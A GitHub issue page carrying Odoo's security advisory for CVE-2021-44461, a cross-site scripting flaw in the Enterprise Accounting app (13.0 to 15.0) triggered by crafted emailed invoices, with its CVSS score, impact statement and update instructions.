Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[SEC] CVE-2021-44461 - Cross-site scripting (XSS) issue in Accountin... #107686

Closed
odony opened this issue Dec 10, 2022 · 0 comments
Closed

[SEC] CVE-2021-44461 - Cross-site scripting (XSS) issue in Accountin... #107686

odony opened this issue Dec 10, 2022 · 0 comments
Labels
Security security announcements

Comments

@odony
Copy link
Contributor

odony commented Dec 10, 2022

Security Advisory - CVE-2021-44461

Affects: Odoo 13.0 to 15.0 (Enterprise Edition)
CVE ID: CVE-2021-44461
Component: Accounting (account_accountant)

Cross-site scripting (XSS) issue in Accounting app of Odoo Enterprise 13.0
through 15.0, allows remote attackers who are able to control the contents
of accounting journal entries to inject arbitrary web script in the browser
of a victim.

I. Background

The Odoo accounting application allows external users to send invoices by email
that are automatically imported into an Odoo database.

II. Problem Description

The content of the invoice was not properly sanitized.

III. Impact

Attack Vector: Network exploitable
Authentication: None
CVSS3 Score: Medium :: 6.5
CVSS3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

A malicious user could send a crafted invoice and trigger injected web script
code when an accountant opens the invoice.

Odoo S.A. is not aware of any use of this vulnerability in the wild.

IV. Workaround

No workaround is available, updating to the latest revision or applying the
corresponding patch is strongly recommended.

Odoo Cloud servers have been patched as soon as the correction was available.

V. Solution

Update to the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
If updating is not an option, you may instead apply the patch corresponding
to your Odoo installation (links provided below).

For the actual update procedure, please refer to our update instructions, valid
for all versions: https://www.odoo.com/documentation/15.0/setup/update.html

VI. Correction details

The following list contains the patches that fix the vulnerability for
each version:

@odony odony closed this as completed Dec 10, 2022
@odoo odoo locked and limited conversation to collaborators Dec 10, 2022
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
Security security announcements
Projects
None yet
Development

No branches or pull requests

1 participant